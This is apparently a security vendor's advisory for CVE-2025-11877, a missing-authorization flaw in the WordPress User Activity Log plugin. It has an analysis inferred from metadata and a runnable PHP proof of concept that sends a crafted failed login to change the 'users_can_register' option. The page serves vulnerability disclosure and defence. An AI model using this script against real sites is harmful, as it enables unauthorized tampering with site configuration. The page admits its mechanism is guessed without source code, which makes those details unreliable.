Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-11877: User Activity Log <= 2.2 – Unauthenticated Limited Options Update via Failed Login (user-activity-log)

CVE ID CVE-2025-11877
Plugin user-activity-log
Severity High (CVSS 7.5)
CWE 862
Vulnerable Version 2.2
Patched Version
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-11877 (metadata-based):
This vulnerability is an unauthenticated options update in the User Activity Log plugin. The flaw resides in the failed login handler, allowing attackers to modify specific WordPress site options. The CVSS score of 7.5 reflects a high integrity impact with no authentication required.

CWE-862 indicates a missing authorization check. The vulnerability description confirms the ‘ual_shook_wp_login_failed’ hook callback writes user-supplied data directly into an update_option() call without verifying user capabilities. Atomic Edge research infers the function likely receives the failed username as a parameter and uses it unsanitized as an option name or value. This conclusion is based on the CWE classification and the public description, as source code is unavailable for confirmation.

Exploitation involves triggering a failed login event. Attackers send a POST request to the WordPress login URL, wp-login.php, with a crafted username parameter. The username must match a target site option name, such as ‘users_can_register’. The plugin’s hooked function then updates this option’s value from 0 to a non-zero integer, likely the count of failed attempts. This action can reopen user registration or corrupt critical options like ‘wp_user_roles’.

Remediation requires adding a proper capability check, such as current_user_can(‘manage_options’), to the ‘ual_shook_wp_login_failed’ function before any update_option() call. The function should also validate that the data being written is strictly related to login logging, not arbitrary option names. A patched version would prevent unauthenticated users from influencing option updates.

Successful exploitation allows unauthenticated attackers to alter WordPress configuration. Setting ‘users_can_register’ to 1 enables open registration, potentially leading to site spam or a pre-authentication account creation vector. Corrupting the ‘wp_user_roles’ option can break administrative access, causing a denial of service for site administrators. The impact is limited to option modification and does not grant direct code execution or data confidentiality loss.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-11877 - User Activity Log <= 2.2 - Unauthenticated Limited Options Update via Failed Login
<?php
/**
 * Proof of Concept for CVE-2025-11877.
 * This script exploits the missing authorization in the 'ual_shook_wp_login_failed' hook.
 * It sends a failed login attempt with a username set to a target WordPress option.
 * The plugin then calls update_option() with this username, changing its value from 0.
 * Assumptions: The target site uses a vulnerable version (<=2.2) of the User Activity Log plugin.
 * The 'users_can_register' option is targeted to enable open registration.
 */

$target_url = 'http://example.com/wp-login.php'; // CHANGE THIS TO THE TARGET SITE URL

// The option name to modify. 'users_can_register' is a standard WordPress option.
// According to the description, the plugin updates the option value to a non-zero integer.
$malicious_username = 'users_can_register';

// Standard WordPress login parameters. A random password ensures login failure.
$post_data = array(
    'log' => $malicious_username,
    'pwd' => 'atomic_edge_failed_login_attempt_' . rand(),
    'wp-submit' => 'Log In'
);

// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects to see response.

// Execute the request to trigger the failed login hook.
echo "[+] Sending malicious failed login request to: $target_urln";
echo "[+] Username (target option): $malicious_usernamen";
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response Code: $http_coden";
if ($http_code == 200) {
    echo "[+] Request completed. The 'users_can_register' option may now be set to 1.n";
    echo "[+] Verify by checking the WordPress General Settings page or querying the wp_options table.n";
} else {
    echo "[-] Unexpected HTTP code. The site may have redirects or custom login handling.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School